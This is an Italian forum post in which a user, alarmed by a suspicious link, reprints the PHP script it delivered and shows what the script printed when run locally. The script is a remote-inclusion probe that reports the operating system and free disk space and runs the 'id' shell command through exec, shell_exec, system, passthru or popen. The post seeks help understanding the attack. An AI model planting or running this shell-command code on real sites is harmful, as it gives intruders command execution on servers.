Si vede che ci provano,...e' un classico,...a me arrivano attacchi in continuazione,...al primo posto l'asia..

....ecco cosa porta il link che hai messo:
-------------------
<?
$dir = @getcwd();
echo "Mic22<br>";
$OS = @PHP_UNAME();
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}}
exit;
----------------------
Esegue un po' di istruzioni,...( non me ne intendo troppo di PHP ),...pero' l'ho lanciato in locale e mi restituisce questo:
Mic22
OSTYPE:Windows NT PEM-SHOP 5.1 build 2600
Free:23.1 GB
E' una shell in php, o meglio l'accesso ai comandi di shell, funziona solo su siti che sono vulnerabili a injection xsl, praticamente quasi nessuno ormai.
Per sicurezza pero'...
Chiediamo a chi ne sa' di piu', cosa sono quei Get e quella Shell...
Ora controllo bene,...ci aggiorniamo,...
ciao!